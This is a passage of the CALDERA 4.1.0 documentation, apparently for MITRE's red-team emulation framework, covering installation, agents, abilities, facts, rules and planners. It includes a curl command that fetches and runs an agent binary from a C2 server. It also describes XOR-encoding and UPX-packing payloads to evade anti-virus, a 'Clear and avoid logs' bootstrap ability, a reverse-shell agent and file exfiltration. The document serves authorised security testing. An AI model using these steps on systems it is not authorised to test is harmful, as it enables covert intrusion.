CALDERA Documentation, Release 4.1.0
1 Installing CALDERA
1.1 Requirements
1.2 Installation
1.3 Docker Deployment
1.4 Offline Installation
2 Getting started
2.1 Autonomous red-team engagements
2.2 Autonomous incident-response
2.3 Manual red-team engagements
2.4 Research on artificial intelligence
4 Basic Usage
4.1 Agents
4.2 Abilities
4.3 Adversary Profiles
4.4 Operations
4.5 Facts
4.6 Fact sources
4.7 Rules
4.8 Planners
4.9 Plugins
5 Server Configuration
5.1 Startup parameters
5.2 Configuration file
5.3 Custom configuration files
5.4 Enabling LDAP login
5.5 Setting Custom Login Handlers
6 Plugin library
6.1 Sandcat
6.2 Mock
6.3 Manx
6.4 Stockpile
6.5 Response
6.6 Compass
6.7 Caltack
6.8 SSL
6.9 Atomic
6.10 GameBoard
6.11 Human
6.12 Training
6.13 Access
6.14 Builder
6.15 Debrief
7 Parsers
7.1 Linking Parsers to an Ability
8 Relationships
8.1 Creating Relationships using Abilities
8.2 Creating Relationships using CALDERA Server
9 Requirements
9.1 Example
10 Objectives
10.1 Objectives
10.2 Goals
11 Operation Results
11.1 Operation Report
11.2 Operation Event Logs
14 Dynamically-Compiled Payloads
14.1 Basic Example
14.2 Advanced Examples
15 Exfiltration
15.1 Exfiltrating Files
15.2 Accessing Exfiltrated Files
15.3 Accessing Operations Reports
15.4 Unencrypting the files
17 C2 Communications Tunneling
17.1 SSH Tunneling
18 Uninstall CALDERA
19 Troubleshooting
19.1 Installing CALDERA
19.2 Starting CALDERA
19.3 Stopping CALDERA
19.4 Agent Deployment
19.5 Operations
19.6 Opening Files
20 Resources
20.1 Ability List
20.2 Lateral Movement Video Tutorial
22 An Example
22.1 Pre-Work: GitHub
22.2 Operation Planning
22.3 Finding Content
22.4 Limiting our results
22.5 Staging
22.6 Final Piece: A Password
22.7 Operation
23 Wrap-up
27.3 A Minimal Planner
27.4 Advanced Fact Usage
27.5 Planning Service Utilities
27.6 Operation Utilities
27.7 Knowledge Service
29 app
29.1 app package
Index
CALDERA™ is a cyber security framework designed to easily run autonomous breach-and-simulation exercises. It
can also be used to run manual red-team engagements or automated incident response. CALDERA is built on the
MITRE ATT&CK™ framework and is an active research project at MITRE.
The framework consists of two components:
1. The core system. This is the framework code, including an asynchronous command-and-control (C2) server with a
REST API and a web interface.
2. Plugins. These are separate repositories that hang off of the core framework, providing additional functionality.
Examples include agents, GUI interfaces, collections of TTPs and more.
Visit Installing CALDERA for installation information.
For getting familiar with the project, visit Getting started, which documents step-by-step guides for the most common
use cases of CALDERA, and Basic usage, which documents how to use some of the basic components in core
CALDERA. Visit Learning the terminology for in-depth definitions of the terms used throughout the project.
For information about CALDERA plugins, visit Plugin Library and How to Build Plugins if you are interested in
building your own.
USAGE GUIDES
CHAPTER ONE
INSTALLING CALDERA
CALDERA can be installed in four commands using the concise installation instructions and can, optionally, be
installed and run using a Docker container.
1.1 Requirements
CALDERA aims to support a wide range of target systems; the core requirements are listed below:
• Linux or MacOS operating system
• Python 3.7, 3.8, or 3.9 (with pip3)
• A modern browser (Google Chrome is recommended)
• The packages listed in the requirements file
1.1.1 Recommended
To set up a development environment for CALDERA, and to dynamically compile agents, the following is
recommended:
• GoLang 1.17+ (for optimal agent functionality)
• Hardware: 8GB+ RAM and 2+ CPUs
• The packages listed in the dev requirements file
1.2 Installation
1.2.1 Concise
CALDERA can be installed quickly by executing the following 4 commands in your terminal.
Start by cloning the CALDERA repository recursively, pulling all available plugins. It is recommended to pass the
desired version/release (should be in x.x.x format). Cloning any non-release branch, including master, may result in
bugs.
In general, the git clone command takes the form:
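A typical form, assuming the official MITRE repository on GitHub, is the following (replace x.x.x with the desired release tag; the URL is an assumption based on the project's public repository):

```shell
# Recursive clone pulls the core framework and all plugin submodules.
# Replace x.x.x with a release tag, e.g. 4.1.0.
git clone https://github.com/mitre/caldera.git --recursive --branch x.x.x
```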
Once the clone completes, we can jump into the new caldera directory:
cd caldera
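Next, install the packages from the requirements file (sketched here as the usual pip invocation):

```shell
# Install the Python dependencies listed in the requirements file
pip3 install -r requirements.txt
```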
Finally, start the server (optionally with startup flags for additional logging):
python3 server.py
Once started, log in to http://localhost:8888 with the red user, using the password found in the conf/local.yml file
(this file will be generated on server start).
To learn how to use CALDERA, navigate to the Training plugin and complete the capture-the-flag style course.
1.3 Docker Deployment

Start by cloning the CALDERA repository as described above. Next, build the docker image, changing the image tag as desired.
cd caldera
docker build --build-arg WIN_BUILD=true . -t caldera:server
docker-compose build
Finally, run the docker CALDERA server, changing port forwarding as required. More information on CALDERA’s
configuration is available here.
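A minimal sketch of the run command, assuming the caldera:server tag built above and the default HTTP port, is:

```shell
# Publish the default HTTP contact port (8888) from the container.
# Add further -p flags for any TCP/UDP contact ports your agents will use.
docker run -p 8888:8888 caldera:server
```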
1.4 Offline Installation

It is possible to use pip to install CALDERA on a server without internet access. Dependencies will be downloaded to
a machine with internet access, then copied to the offline server and installed.
To minimize issues with this approach, the internet machine’s platform and Python version should match the offline
server. For example, if the offline server runs Python 3.8 on Ubuntu 20.04, then the machine with internet access should
run Python 3.8 and Ubuntu 20.04.
Run the following commands on the machine with internet access. These commands will clone the CALDERA
repository recursively (passing the desired version/release in x.x.x format) and download the dependencies using pip:
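A sketch of those commands, assuming the official GitHub repository and a dependency directory named python_deps (the directory name is an assumption):

```shell
# Clone the repository recursively at the desired release tag
git clone https://github.com/mitre/caldera.git --recursive --branch x.x.x
# Download (but do not install) the dependencies into python_deps
pip3 download -r caldera/requirements.txt --dest caldera/python_deps
```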
The caldera directory now needs to be copied to the offline server (via scp, sneakernet, etc.).
On the offline server, the dependencies can then be installed with pip3:
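Assuming the downloaded packages were placed in a directory named python_deps (an assumed name), the offline install typically looks like:

```shell
# Install from the local dependency directory only, without touching the network
pip3 install -r requirements.txt --no-index --find-links python_deps
```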
cd caldera
python3 server.py
CHAPTER TWO
GETTING STARTED
CALDERA, as a cybersecurity framework, can be used in several ways. For most users, it will be used to run either
offensive (red) or defensive (blue) operations.
Here are the most common use-cases and basic instructions on how to proceed.
2.1 Autonomous red-team engagements

This is the original CALDERA use-case. You can use the framework to build a specific threat (adversary) profile and
launch it in a network to see where you may be susceptible. This is good for testing defenses and training blue teams
on how to detect threats.
The following steps will walk through logging in, deploying an agent, selecting an adversary, and running an operation:
1) Log in as a red user. By default, a “red” user is created with a password found in the conf/local.yml file (or
conf/default.yml if using insecure settings).
2) Deploy an agent
• Navigate to the Agents page and click the “Click here to deploy an agent” button
• Choose the Sandcat agent and platform (victim operating system)
• Check that the value for app.contact.http matches the host and port the CALDERA server is listening
on
• Run the generated command on the victim machine. Note that some abilities will require elevated privileges,
which would require the agent to be deployed in an elevated shell.
• Ensure that a new agent appears in the table on the Agents page
3) Choose an adversary profile
• Navigate to the Adversaries page
• Select an adversary from the dropdown and review abilities. The “Discovery” and “Hunter” adversaries
from the Stockpile plugin are good starting profiles.
4) Run an operation
• Navigate to the Operations page and add an operation by toggling the View/Add switch
• Type in a name for the operation
• Under the basic options, select a group that contains the recently deployed agent (“red” by default)
• Under the basic options, select the adversary profile chosen in the last step
• Click the start button to begin the operation
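For reference, the generated Sandcat deployment command for a Linux victim takes roughly the following shape (the server address and binary name splunkd are examples; always copy the exact command from the UI):

```shell
# Download the compiled Sandcat binary from the C2 server, then run it
# as a red-group agent beaconing back to that server.
server="http://localhost:8888";
curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > splunkd;
chmod +x splunkd;
./splunkd -server $server -group red -v
```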
2.2 Autonomous incident-response

CALDERA can be used to perform automated incident response through deployed agents. This is helpful for identifying
TTPs that other security tools may not see or block.
The following steps will walk through logging in to CALDERA blue, deploying a blue agent, selecting a defender, and
running an operation:
1) Log in as a blue user. By default, a “blue” user is created with a password found in the conf/local.yml file
(or conf/default.yml if using insecure settings).
2) Deploy a blue agent
• Navigate to the Agents page and click the “Click here to deploy an agent” button
• Choose the Sandcat agent and platform (victim operating system)
• Check that the value for app.contact.http matches the host and port the CALDERA server is listening
on
• Run the generated command on the victim machine. The blue agent should be deployed with elevated
privileges in most cases.
• Ensure that a new blue agent appears in the table on the Agents page
3) Choose a defender profile
• Navigate to the Defenders page
• Select a defender from the dropdown and review abilities. The “Incident responder” defender is a good
starting profile.
4) Choose a fact source. Defender profiles utilize fact sources to determine good vs. bad on a given host.
• Navigate to the Sources page
• Select a fact source and review facts. Consider adding facts to match the environment (for example, add a
fact with the remote.port.unauthorized name and a value of 8000 to detect services running on port
8000)
• Save the source if any changes were made
5) Run an operation
• Navigate to the Operations page and add an operation by toggling the View/Add switch
• Type in a name for the operation
• Under the basic options, select a group that contains the recently deployed agent (“blue” by default)
• Under the basic options, select the defender profile chosen previously
• Under the autonomous menu, select the fact source chosen previously
• Click the start button to begin the operation
6) Review the operation
• While the operation is running, abilities will be executed on the deployed agent. Click the stars next to run
abilities to view the output.
• Consider manually running commands (or using an automated adversary) which will trigger incident
response actions (such as starting a service on an unauthorized port)
7) Export operation results
• Once the operation finishes, users can export operation reports in JSON format by clicking the “Download
report” button in the operation GUI modal. Users can also export operation event logs in JSON format by
clicking the “Download event logs” button in the operations modal. The event logs will also be automatically
written to disk when the operation finishes. For more information on the various export formats and
automatic/manual event log generation, see the Operation Result page.
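The fact added in step 4 can also be expressed directly in a fact source YAML file. A sketch follows (the source id and name are illustrative; the trait/value layout mirrors the fact format used elsewhere in CALDERA):

```yaml
id: 0f4c3c67-845e-49a0-927e-90ed33c044e0   # illustrative UUID
name: Example Defender Source
facts:
- trait: remote.port.unauthorized   # flag services on this port as bad
  value: 8000
```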
2.3 Manual red-team engagements

CALDERA can be used to perform manual red-team assessments using the Manx agent. This is good for replacing or
augmenting existing offensive toolsets in a manual assessment, as the framework can be extended with any custom
tools you may have.
The following steps will walk through logging in, deploying a Manx agent, and running manual commands:
1) Log in as a red user
2) Deploy a Manx agent
• Navigate to the Agents page and click the “Click here to deploy an agent” button
• Choose the Manx agent and platform (victim operating system)
• Check that the values for app.contact.http, app.contact.tcp, and app.contact.udp match the
host and ports the CALDERA server is listening on
• Run the generated command on the victim machine
• Ensure that a new agent appears in the table on the Agents page
3) Run manual commands
• Navigate to the Manx plugin
• Select the deployed agent in the session dropdown
• Run manual commands in the terminal window
2.4 Research on artificial intelligence

CALDERA can be used to test artificial intelligence and other decision-making algorithms using the Mock plugin. The
plugin adds simulated agents and mock ability responses, which can be used to simulate an entire operation.
To use the mock plugin:
1) With the server stopped, enable the mock plugin. Restart the server.
2) Log in as a red user
3) In the Agents modal, review the simulated agents that have been spun up
4) Run an operation using any adversary against your simulated agents. Note how the operation runs
non-deterministically.
5) Adjust the decision logic in a planner, such as the batch.py planner in the Stockpile plugin, to test out different
theories
CHAPTER THREE
LEARNING THE TERMINOLOGY
3.1 Agents
Agents are software programs that connect back to CALDERA at certain intervals to get instructions. Agents
communicate with the CALDERA server via a contact method, initially defined at agent install.
Installed agents appear in the UI in the Agents dialog. Agents are identified by their unique paw - or paw print.
CALDERA includes a number of agent programs, each adding unique functionality. A few examples are listed below:
• Sandcat: A GoLang agent which can communicate through various C2 channels, such as HTTP, Github GIST,
or DNS tunneling.
• Manx: A GoLang agent which communicates via the TCP contact and functions as a reverse-shell
• Ragdoll: A Python agent which communicates via the HTML contact
Agents can be placed into a group, either at install through command line flags or by editing the agent in the UI. These
groups are used when running an operation to determine which agents to execute abilities on.
The group determines whether an agent is a “red agent” or a “blue agent”. Any agent started in the “blue” group will
be accessible from the blue dashboard. All other agents will be accessible from the red dashboard.
3.2 Abilities and Adversaries

An ability is a specific ATT&CK tactic/technique implementation which can be executed on running agents. Abilities
will include the command(s) to run, the platforms / executors the commands can run on (ex: Windows / PowerShell),
payloads to include, and a reference to a module to parse the output on the CALDERA server.
Adversary profiles are groups of abilities, representing the tactics, techniques, and procedures (TTPs) available to a
threat actor. Adversary profiles are used when running an operation to determine which abilities will be executed.
3.3 Operations
Operations run abilities on agent groups. Adversary profiles are used to determine which abilities will be run and agent
groups are used to determine which agents the abilities will be run on.
The order in which abilities are run is determined by the planner. A few examples of planners included by default in
CALDERA are listed below:
• atomic: Run abilities in the adversary profile according to the adversary’s atomic ordering
• batch: Run all abilities in the adversary profile at once
3.4 Plugins
CALDERA is a framework extended by plugins. These plugins provide CALDERA with extra functionality in some
way.
Multiple plugins are included by default in CALDERA. A few noteworthy examples are below, though a more complete
and detailed list can be found on the Plugin Library page:
• Sandcat: The Sandcat agent is the recommended agent for new users
• Stockpile: This plugin holds the majority of open-source abilities, adversaries, planners, and obfuscators created
by the CALDERA team
• Training: The training plugin walks users through most of CALDERA’s functionality – recommended for new
users
CHAPTER FOUR
BASIC USAGE
4.1 Agents
To deploy an agent:
1. Navigate to the Agents module in the side menu under “Campaigns” and click the “Deploy an agent” button
2. Choose an agent (Sandcat is a good one to start with) and a platform (target operating system)
3. Make sure the agent options are correct (e.g. ensure app.contact.http matches the expected host and port for
the CALDERA server)
• app.contact.http represents the HTTP endpoint (including the IP/hostname and port) that the C2 server
is listening on for agent requests and beacons. Examples: http://localhost:8888, https://10.1.2.3,
http://myc2domain.com:8080
• agents.implant_name represents the base name of the agent binary. For Windows agents, .exe will be
automatically appended to the base name (e.g. splunkd will become splunkd.exe).
• agent.extensions takes in a comma-separated list of agent extensions to compile with your agent binary.
When selecting the associated deployment command, this will instruct the C2 server to compile the agent
binary with the requested extensions, if they exist. If you just want a basic agent without extensions, leave
this field blank. See Sandcat extension documentation for more information on Sandcat extensions.
4. Choose a command to execute on the target machine. If you want your agent to be compiled with the extensions
from agent.extensions, you must select the associated deployment command below: Compile red-team
agent with a comma-separated list of extensions (requires GoLang).
5. On the target machine, paste the command into the terminal or PowerShell window and execute it
6. The new agent should appear in the table in the Agents tab (if the agent does not appear, check the Agent
Deployment section of the Troubleshooting page)
To kill an agent, use the “Kill Agent” button under the agent-specific settings. The agent will terminate on its next
beacon.
To remove the agent from CALDERA (this will not kill the agent), click the red X. Running agents removed from
CALDERA will reappear when they next check in.
4.2 Abilities
The majority of abilities are stored inside the Stockpile plugin (plugins/stockpile/data/abilities), alongside the
adversary profiles which use them. Abilities created through the UI will be placed in data/abilities.
Here is a sample ability:
- id: 9a30740d-3aa8-4c23-8efa-d51215e8a5b9
  name: Scan WIFI networks
  description: View all potential WIFI networks on host
  tactic: discovery
  technique:
    attack_id: T1016
    name: System Network Configuration Discovery
  platforms:
    darwin:
      sh:
        command: |
          ./wifi.sh scan
        payload: wifi.sh
    linux:
      sh:
        command: |
          ./wifi.sh scan
        payload: wifi.sh
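The sample above is truncated at the page break; the same ability also carries a Windows executor, which can be sketched as follows (the psh command flag and wifi.ps1 payload mirror the Stockpile version, but the exact command may differ):

```yaml
    windows:
      psh:
        command: |
          .\wifi.ps1 -Scan   # -Scan flag is illustrative
        payload: wifi.ps1
```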
Things to note:
• Each ability has a random UUID id
• Each ability requires a name, description, ATT&CK tactic and technique information
• Each ability requires a platforms list, which should contain at least 1 block for a supported operating system
(platform). Currently, abilities can be created for Windows, Linux, and Darwin (MacOS).
• Abilities can be added to an adversary through the GUI with the ‘add ability’ button
• The delete_payload field (optional, placed at the top level, expects True or False) specifies whether the agent
should remove the payload from the filesystem after the ability completes. The default value, if not provided, is
True.
• The singleton field (optional, placed at the top level, expects True or False) specifies that the ability should only
be run successfully once - after it succeeds, it should not be run again in the same operation. The default value,
if not provided, is False.
• The repeatable field (optional, placed at the top level, expects True or False) specifies that the ability can be
repeated as many times as the planner desires. The default value, if not provided, is False.
Please note that only one of singleton or repeatable should be True at any one time - singleton operates at an operational
level, and repeatable at an agent level. If both are True at the same time, CALDERA may behave unexpectedly.
For each platform, there should be a list of executors. In the default Sandcat deployment, Darwin and Linux platforms
can use sh and Windows can use psh (PowerShell) or cmd (command prompt).
Each platform block consists of a:
• command (required)
• payload (optional)
• uploads (optional)
• cleanup (optional)
• parsers (optional)
• requirements (optional)
• timeout (optional)
Command: A command can be one line or many and should contain the code you would like the ability to execute.
Newlines in the command will be deleted before execution. The command can (optionally) contain variables, which
are identified as #{variable}.
Prior to execution of a command, CALDERA will search for variables within the command and attempt to replace
them with values. The values used for substitution depend on the type of variable in the command: user-defined or
global. User-defined variables are associated with facts and can be filled in with fact values from fact sources or
parser output, while global variables are filled in by CALDERA internally and cannot be substituted with fact values.
The following global variables are defined within CALDERA:
• #{server} references the FQDN of the CALDERA server itself. Because every agent may know the location of
CALDERA differently, using the #{server} variable allows you to let the system determine the correct location
of the server.
• #{group} is the group a particular agent is a part of. This variable is mainly useful for lateral movement, where
your command can start an agent within the context of the agent starting it.
• #{paw} is the unique identifier - or paw print - of the agent.
• #{location} is the location of the agent on the client file system.
• #{exe_name} is the executable name of the agent.
• #{upstream_dest} is the address of the immediate “next hop” that the agent uses to reach the CALDERA
server. For agents that directly connect to the server, this will be the same as the #{server} value. For agents
that use peer-to-peer, this value will be the peer address used.
• #{origin_link_id} is the internal link ID associated with running this command used for agent tracking.
• #{payload} and #{payload:<uuid>} are used primarily in cleanup commands to denote a payload file
downloaded by an agent.
• #{app.*} are configuration items found in your main CALDERA configuration (e.g., conf/default.yml)
with a prefix of app.. Variables starting with app. that are not found in the CALDERA configuration are not
treated as global variables and can be subject to fact substitution.
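For instance, a lateral-movement ability that starts a new agent on another host could combine several of these globals at once (a sketch; the executable name and flags echo the Sandcat agent but are illustrative here):

```yaml
command: |
  # Start a copy of this agent, pointing it back at the same server
  # and placing it in the same group as the launching agent
  ./#{exe_name} -server #{server} -group #{group} -v
```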
Payload: A comma-separated list of files which the ability requires in order to run. In the example ability above, the
darwin and linux executors use the payload wifi.sh. This means, before the ability is used, the agent will download
wifi.sh from CALDERA. If the file already exists, it will not download it. You can store any type of file in the payload
directories of any plugin.
Did you know that you can assign functions to execute on the server when specific payloads are requested
for download? An example of this is the sandcat.go file. Check the plugins/sandcat/hook.py file to see
how special payloads can be handled.
Payloads can be stored as regular files, or you can XOR-encode them so that server-side anti-virus does not pick
them up. To do this, run app/utility/payload_encoder.py against the file to create an encoded version of it. Then
store and reference the encoded payload instead of the original.
The payload_encoder.py file has a docstring which explains how to use the utility.
Payloads can also be run through a packer to further obfuscate them from detection on a host machine. To do this,
put the packer module name in front of the filename, followed by a colon ‘:’. This non-filename character will
be passed in the agent’s call to the download endpoint, and the file will be packed before being sent back to the agent.
UPX is currently the only supported packer, but adding additional packers is a simple task.
An example for setting up for a packer to be used would be editing the filename in the payload section of
an ability file: - upx:Akagi64.exe
Uploads: A list of files which the agent will upload to the C2 server after running the ability command. The filepaths
can be specified as local file paths or absolute paths. The ability assumes that these files will exist during the time of
upload.
Below is an example ability that uses the uploads keyword:
---
- id: 22b9a90a-50c6-4f6a-a1a4-f13cb42a26fd
name: Upload file example
description: Example ability to upload files
tactic: exfiltration
technique:
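The upload example is truncated at the page break; a completed sketch of such an ability (the technique, command, and file path are illustrative) could read:

```yaml
- id: 22b9a90a-50c6-4f6a-a1a4-f13cb42a26fd
  name: Upload file example
  description: Example ability to upload files
  tactic: exfiltration
  technique:
    attack_id: T1041          # illustrative ATT&CK mapping
    name: Exfiltration Over C2 Channel
  platforms:
    darwin:
      sh:
        command: |
          echo "sample contents" > /tmp/exfil-test.txt
        cleanup: |
          rm -f /tmp/exfil-test.txt
        uploads:              # files sent to the C2 server after the command runs
        - /tmp/exfil-test.txt
```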
Cleanup: An instruction that will reverse the result of the command. This is intended to put the computer back into the
state it was before the ability was used. For example, if your command creates a file, you can use the cleanup to remove
the file. Cleanup commands run after an operation, in the reverse order they were created. Cleaning up an operation is
also optional, which means you can start an operation and instruct it to skip all cleanup instructions.
Cleanup is not needed for abilities, like above, which download files through the payload block. Upon an operation
completing, all payload files will be removed from the client (agent) computers.
Parsers: A list of parsing modules which can parse the output of the command into new facts. Interested in this topic?
Check out how CALDERA parses facts, which goes into detail about parsers.
Abilities can also make use of two CALDERA REST API endpoints, file upload and download.
Requirements: Required relationships of facts that need to be established before this ability can be used. See Require-
ments for more information.
Timeout: How many seconds to allow the command to run.
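Taken together, a single executor block combining several of these optional fields can be sketched as follows (all values illustrative):

```yaml
platforms:
  linux:
    sh:
      command: |
        ./stage.sh #{server}   # required: the code the ability executes
      payload: stage.sh        # optional: file the agent downloads first
      cleanup: |
        rm -f ./stage.sh       # optional: reverses the command's effects
      timeout: 60              # optional: seconds the command may run
```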
Bootstrap Abilities are abilities that an agent runs immediately after sending its first beacon. A bootstrap ability can be added through the GUI by entering the ability ID into the ‘Bootstrap Abilities’ field in the ‘Agents’ tab. Alternatively, you can edit the conf/agents.yml file and include the ability ID in the bootstrap abilities section of the file (ensure the server is turned off before editing any configuration files).
Deadman Abilities are abilities that an agent runs just before graceful termination. When the Caldera server receives an
initial beacon from an agent that supports deadman abilities, the server will immediately send the configured deadman
abilities, along with any configured bootstrap abilities, to the agent. The agent will save the deadman abilities and
execute them if terminated via the GUI or if self-terminating due to watchdog timer expiration or disconnection from
the C2. Deadman abilities can be added through the GUI by entering a comma-separated list of ability IDs into the
‘Deadman Abilities’ field in the ‘Agents’ tab. Alternatively, you can edit the ‘conf/agents.yml’ file and include the
ability ID in the ‘deadman_abilities’ section of the file (ensure the server is turned off before editing any configuration
files).
Below is an example conf/agents.yml file with configured bootstrap and deadman abilities:
bootstrap_abilities:
- 43b3754c-def4-4699-a673-1d85648fda6a # Clear and avoid logs
deadman_abilities:
- 5f844ac9-5f24-4196-a70d-17f0bd44a934 # delete agent executable upon termination
implant_name: splunkd
4.3 Adversary Profiles
The majority of adversary profiles are stored inside the Stockpile plugin (plugins/stockpile/data/adversaries).
Adversary profiles created through the UI will be placed in data/adversaries.
Adversaries consist of an objective (optional) and a list of abilities under atomic_ordering. This ordering determines
the order in which abilities will be run.
An example adversary is below:
id: 5d3e170e-f1b8-49f9-9ee1-c51605552a08
name: Collection
description: A collection adversary
objective: 495a9828-cab1-44dd-a0ca-66e58177d8cc
atomic_ordering:
- 1f7ff232-ebf8-42bf-a3c4-657855794cfe #find company emails
- d69e8660-62c9-431e-87eb-8cf6bd4e35cf #find ip addresses
- 90c2efaa-8205-480d-8bb6-61d90dbaf81b #find sensitive files
- 6469befa-748a-4b9c-a96d-f191fde47d89 #create staging dir
4.4 Operations
• Jitter: Agents normally check in with CALDERA every 60 seconds. Once they realize they are part of an active
operation, agents will start checking in according to the jitter time, which is by default 2/8. This fraction tells the
agents that they should pause between 2 and 8 seconds (picked at random each time an agent checks in) before
using the next ability.
• Visibility: How visible should the operation be to the defense. Defaults to 51 because each ability defaults to a
visibility of 50. Abilities with a higher visibility than the operation visibility will be skipped.
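The jitter check-in behavior described above can be sketched as follows (illustrative only; agent internals may differ):

```python
import random

def parse_jitter(fraction):
    """Split a jitter string like '2/8' into (min, max) seconds."""
    low, high = (int(part) for part in fraction.split('/'))
    return low, high

def next_pause(fraction):
    """Pick a random pause inside the jitter bounds, as described above."""
    low, high = parse_jitter(fraction)
    return random.randint(low, high)
```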
After starting an operation, users can export the operation report in JSON format by clicking the “Download report”
button in the operation GUI modal. For more information on the operation report format, see the Operation Result
section.
4.5 Facts
A fact is an identifiable piece of information about a given computer. Facts can be used to perform variable assignment
within abilities.
Facts are composed of the following:
• name: a descriptor which identifies the type of the fact and can be used for variable names within abilities.
Example: host.user.name. Note that CALDERA 3.1.0 and earlier required fact names/traits to be formatted
as major.minor.specific but this is no longer a requirement.
• value: any arbitrary string. An appropriate value for a host.user.name may be “Administrator” or “John”.
• score: an integer which associates a relative importance for the fact. Every fact, by default, gets a score of 1. If
a host.user.password fact is important or has a high chance of success if used, you may assign it a score of
5. When an ability uses a fact to fill in a variable, it will use those with the highest scores first. If a fact has a
score of 0, it will be blocklisted - meaning it cannot be used in the operation.
If a property has a prefix of host. (e.g., host.user.name) that fact will only be used by the host that
collected it.
As hinted above, when CALDERA runs abilities, it scans the command and cleanup instructions for variables. When
it finds one, it then looks at the facts it has and sees if it can replace the variables with matching facts (based on the
property). It will then create new variants of each command/cleanup instruction for each possible combination of facts
it has collected. Each variant will be scored based on the cumulative score of all facts inside the command. The highest
scored variants will be executed first.
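The variant-generation and scoring behavior can be sketched as follows (a simplified illustration; the fact names and scores are examples, not CALDERA's actual code):

```python
import itertools
import re

def build_variants(command, facts):
    """Expand #{variable} references using collected facts (sketch).

    facts maps a fact name to a list of (value, score) pairs. Variants
    containing a blocklisted fact (score 0) are skipped; the rest are
    returned highest cumulative score first.
    """
    names = re.findall(r'#\{(.+?)\}', command)
    variants = []
    for combo in itertools.product(*(facts[n] for n in names)):
        if any(score == 0 for _, score in combo):
            continue  # score 0 means blocklisted
        rendered = command
        total = 0
        for name, (value, score) in zip(names, combo):
            rendered = rendered.replace('#{%s}' % name, value)
            total += score
        variants.append((rendered, total))
    return sorted(variants, key=lambda v: v[1], reverse=True)

facts = {'host.user.name': [('Administrator', 5), ('John', 1), ('blocked', 0)]}
variants = build_variants('net user #{host.user.name}', facts)
```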
Facts can be added or modified through the GUI by navigating to Advanced -> Sources and clicking on ‘+ add row’.
4.6 Fact sources
A fact source is a collection of facts that you have grouped together. A fact source can be applied to an operation when
you start it, which gives the operation facts to fill in variables with.
Fact sources can be added or modified through the GUI by navigating to Advanced -> Sources.
4.7 Rules
A rule is a way of restricting or placing boundaries on CALDERA. Rules are directly related to facts and should be
included in a fact sheet.
Rules act similarly to firewall rules and have three key components: fact, action, and match.
1. Fact: the name of the fact that the rule will apply to
2. Action: ALLOW or DENY the fact from use if it matches the rule
3. Match: a regex applied to the fact’s value to determine whether the rule applies
During an operation, the planning service matches each link against the rule-set, discarding it if any of the fact assignments in the link match a rule specifying DENY and keeping it otherwise. In the case that multiple rules match the same fact assignment, the last one listed will be given priority.
Example
rules:
- action: DENY
fact: file.sensitive.extension
match: .*
- action: ALLOW
fact: file.sensitive.extension
match: txt
In this example only the txt file extension will be used. Note that the ALLOW action for txt supersedes the DENY for
all, as the ALLOW rule is listed later in the policy. If the ALLOW rule was listed first, and the DENY rule second,
then all values (including txt) for file.sensitive.extension would be discarded.
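The last-match-wins behavior can be sketched in a few lines (illustrative only; CALDERA's rule engine may differ in detail):

```python
import re

def fact_allowed(fact_name, value, rules):
    """Apply firewall-style rules: the last matching rule wins (sketch).

    Facts with no matching rule are allowed, mirroring the example above.
    """
    decision = True
    for rule in rules:
        if rule['fact'] == fact_name and re.fullmatch(rule['match'], value):
            decision = rule['action'] == 'ALLOW'
    return decision

rules = [
    {'action': 'DENY', 'fact': 'file.sensitive.extension', 'match': '.*'},
    {'action': 'ALLOW', 'fact': 'file.sensitive.extension', 'match': 'txt'},
]
```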
4.7.1 Subnets
- action: DENY
fact: my.host.ip
match: .*
- action: ALLOW
fact: my.host.ip
match: 10.245.112.0/24
In this example, the rules would permit CALDERA to only operate within the 10.245.112.1 to 10.245.112.254 range.
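A sketch of how a CIDR match like the one above could be evaluated (CALDERA's actual rule engine may implement this differently):

```python
import ipaddress

def matches_subnet(value, match):
    """Return True if an IP value falls inside a CIDR match expression.

    Sketch of evaluating a rule like 10.245.112.0/24 against a fact value.
    """
    try:
        network = ipaddress.ip_network(match)
        return ipaddress.ip_address(value) in network
    except ValueError:
        return False  # not an IP or not a CIDR expression
```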
Rules can be added or modified through the GUI by navigating to Advanced -> Sources and clicking on ‘+ view rules’.
Fact source adjustments allow for dynamically adjusting a specific ability’s visibility in the context of an operation.
Adjustment Example (basic fact source)
adjustments:
1b4fb81c-8090-426c-93ab-0a633e7a16a7:
host.installed.av:
- value: symantec
offset: 3
- value: mcafee
offset: 3
In this example, if in the process of executing an operation, a host.installed.av fact was found with either the value symantec or mcafee, ability 1b4fb81c-8090-426c-93ab-0a633e7a16a7 (Sniff network traffic) would have its visibility score raised and be marked with the status HIGH_VIZ. This framework allows dynamic adjustments to expected ability visibility based on captured facts (in this example, the presence of anti-virus software on the target) which may affect our desire to run the ability, as it might be more easily detected in this environment.
When the “Sniff network traffic” ability is run, its visibility is only adjusted if, at the time of execution, the fact source has a host.installed.av fact with either the value symantec or mcafee. If one or both of these facts are present, each execution of “Sniff network traffic” will have 3 (the value of its offset) added to its visibility score. This visibility adjustment is recorded in the operation report.
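The offset mechanism can be sketched as follows (illustrative; it assumes each matching entry contributes its offset independently):

```python
def adjusted_visibility(base, ability_id, found_facts, adjustments):
    """Add configured offsets to an ability's visibility score (sketch).

    adjustments mirrors the YAML above: ability id -> fact name -> list of
    {'value': ..., 'offset': ...} entries. found_facts is a set of
    (fact name, value) pairs captured during the operation.
    """
    score = base
    for fact_name, entries in adjustments.get(ability_id, {}).items():
        for entry in entries:
            if (fact_name, entry['value']) in found_facts:
                score += entry['offset']
    return score

adjustments = {
    '1b4fb81c-8090-426c-93ab-0a633e7a16a7': {
        'host.installed.av': [
            {'value': 'symantec', 'offset': 3},
            {'value': 'mcafee', 'offset': 3},
        ],
    },
}
found = {('host.installed.av', 'symantec')}
```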
Adjustments must be added or modified through the fact source’s .yml file, with the exception of new fact sources
created using the REST API’s sources endpoint with a well-formed PUT request.
4.8 Planners
A planner is a module within CALDERA which contains logic for how a running operation should make decisions
about which abilities to use and in what order.
Planners are single module Python files. Planners utilize the core system’s planning_svc.py, which has planning logic
useful for various types of planners.
CALDERA ships with a default planner, atomic. The atomic planner operates by atomically sending a single ability
command to each agent in the operation’s group at a time, progressing through abilities as they are enumerated in the
underlying adversary profile. When a new agent is added to the operation, the atomic planner will start with the first
ability in the adversary profile.
The atomic planner can be found in the mitre/stockpile GitHub repository at app/atomic.py.
For any other planner behavior and functionality, a custom planner is required. CALDERA has open-sourced some custom planners, including the batch and buckets planners. From time to time, the CALDERA team will open source further planners as they become more widely used and publicly available.
The batch planner will retrieve all ability commands available and applicable for the operation and send them to the
agents found in the operation’s group. The batch planner uses the planning service to retrieve ability commands based
on the chosen adversary and known agents in the operation. The abilities returned to the batch planner are based on the
